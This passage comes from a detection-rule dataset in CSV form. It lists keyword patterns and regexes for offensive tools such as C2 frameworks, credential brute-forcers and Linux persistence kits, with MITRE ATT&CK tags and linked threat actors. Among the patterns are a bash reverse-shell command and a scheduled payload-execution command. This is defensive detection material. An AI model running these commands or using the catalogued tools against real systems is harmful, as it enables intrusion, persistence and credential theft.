Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12229" "*/UnlinkDLL.git*",".{0,1000}\/UnlinkDLL\.git.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","N/A","7","1","57","13","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z","12230" "*/UnmanagedPowerShell.git*",".{0,1000}\/UnmanagedPowerShell\.git.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","1","N/A","N/A","6","5","487","113","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z","12232" "*/unrootkit.dll*",".{0,1000}\/unrootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","12233" "*/unshackle.git*",".{0,1000}\/unshackle\.git.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","12234" "*/unshackle.modules*",".{0,1000}\/unshackle\.modules.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1899","125","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z","12235" "*/unstable/net/iodine*",".{0,1000}\/unstable\/net\/iodine.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","1","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","12237" "*/UnstoppableService.git*",".{0,1000}\/UnstoppableService\.git.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","1","N/A","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","12238" "*/unused/locktest.sh*",".{0,1000}\/unused\/locktest\.sh.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12239" 
"*/unused/Yosemite.patch*",".{0,1000}\/unused\/Yosemite\.patch.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","12240" "*/unusual-port.nse*",".{0,1000}\/unusual\-port\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12241" "*/upload_c2profiles.py*",".{0,1000}\/upload_c2profiles\.py.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","12246" "*/Upload-OneDrive.exe*",".{0,1000}\/Upload\-OneDrive\.exe.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","1","N/A","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","12247" "*/upnp-info.nse*",".{0,1000}\/upnp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12248" "*/uptime-agent-info.nse*",".{0,1000}\/uptime\-agent\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12249" "*/url-snarf.nse*",".{0,1000}\/url\-snarf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12250" "*/usb140201.zip*",".{0,1000}\/usb140201\.zip.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12251" "*/user_data/*/keylog.txt*",".{0,1000}\/user_data\/.{0,1000}\/keylog\.txt.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","12252" "*/user_persistence_run.c*",".{0,1000}\/user_persistence_run\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","12253" "*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","12254" 
"*/userenum.go*",".{0,1000}\/userenum\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","12255" "*/UserlandBypass/*.c*",".{0,1000}\/UserlandBypass\/.{0,1000}\.c.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","12256" "*/username-anarchy*",".{0,1000}\/username\-anarchy.{0,1000}","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","Black Basta","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","N/A","10","1000","140","2024-09-20T01:57:59Z","2012-11-07T05:35:10Z","12257" "*/UserNamespaceOverlayfsSetuidWriteExec/*",".{0,1000}\/UserNamespaceOverlayfsSetuidWriteExec\/.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","12258" "*/UserRightsUtil.exe*",".{0,1000}\/UserRightsUtil\.exe.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12259" "*/Use-Waitfor.exe*",".{0,1000}\/Use\-Waitfor\.exe.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","12260" "*/usniper.py*",".{0,1000}\/usniper\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12261" "*/usr/bin/at -M -f /tmp/payload*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/tmp\/payload.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12263" "*/usr/bin/at -M -f 
/usr/bin/atest*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/usr\/bin\/atest.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12264" "*/usr/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1*",".{0,1000}\/usr\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/\$ip\/\$port\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12265" "*/usr/bin/gs-mount*",".{0,1000}\/usr\/bin\/gs\-mount.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12268" "*/usr/bin/gs-netcat*",".{0,1000}\/usr\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12269" "*/usr/bin/gsocket*",".{0,1000}\/usr\/bin\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12270" "*/usr/bin/gs-sftp*",".{0,1000}\/usr\/bin\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","12271" "*/usr/bin/legba*",".{0,1000}\/usr\/bin\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","#linux","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","12273" "*/usr/bin/merlinAgent*",".{0,1000}\/usr\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","12337" "*/usr/bin/pkexec*",".{0,1000}\/usr\/bin\/pkexec.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability 
(https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","1","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","12338" "*/usr/bin/polenum*",".{0,1000}\/usr\/bin\/polenum.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A","12339" "*/usr/bin/shad0w*",".{0,1000}\/usr\/bin\/shad0w.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#content #linux","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","12343" "*/usr/include/sdfwex.h*",".{0,1000}\/usr\/include\/sdfwex\.h.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12344" "*/usr/local/bin/escape.sh*",".{0,1000}\/usr\/local\/bin\/escape\.sh.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","12348" 
"*/usr/local/bin/exegol*",".{0,1000}\/usr\/local\/bin\/exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12349" "*/usr/local/bin/nullinux*",".{0,1000}\/usr\/local\/bin\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","12352" "*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","12353" "*/usr/local/bin/reverst*",".{0,1000}\/usr\/local\/bin\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#linux","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","12354" "*/usr/local/bin/rsg*",".{0,1000}\/usr\/local\/bin\/rsg.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black 
Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","12355" "*/usr/local/bin/sliver-server*",".{0,1000}\/usr\/local\/bin\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","12356" "*/usr/local/bin/sshamble*",".{0,1000}\/usr\/local\/bin\/sshamble.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#linux","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","12357" "*/usr/local/pwndrop/*",".{0,1000}\/usr\/local\/pwndrop\/.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","12359" "*/usr/sbin/tor*",".{0,1000}\/usr\/sbin\/tor.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. 
It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12363" "*/usr/share/brutespray*",".{0,1000}\/usr\/share\/brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#linux","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","12367" "*/usr/share/cobaltstrike/*",".{0,1000}\/usr\/share\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","#linux","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","12368" "*/usr/share/doc/chntpw*",".{0,1000}\/usr\/share\/doc\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12370" "*/usr/share/evilginx*",".{0,1000}\/usr\/share\/evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 
- T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#linux","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","12374" "*/usr/share/keyrings/tor-archive-keyring*",".{0,1000}\/usr\/share\/keyrings\/tor\-archive\-keyring.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","#linux","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","12375" "*/usr/share/kidlogger*",".{0,1000}\/usr\/share\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12376" "*/usr/share/metasploit*",".{0,1000}\/usr\/share\/metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#linux","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","12377" "*/usr/share/wordlists/*.txt*",".{0,1000}\/usr\/share\/wordlists\/.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12378" "*/usr/src/netexec*",".{0,1000}\/usr\/src\/netexec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12379" "*/utils/addcomputer.py*",".{0,1000}\/utils\/addcomputer\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","12380" 
"*/utils/external_drive_password_recovery.html*",".{0,1000}\/utils\/external_drive_password_recovery\.html.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12381" "*/utils/mailpv.html*",".{0,1000}\/utils\/mailpv\.html.{0,1000}","offensive_tool_keyword","MailPassView","Mail PassView is a small password-recovery tool that reveals the passwords and other account details for multiple email clients","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - Kimsuky - Evilnum - XDSpy","Credential Access","https://www.nirsoft.net/utils/mailpv.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","12382" "*/utils/network_password_recovery.html*",".{0,1000}\/utils\/network_password_recovery\.html.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of 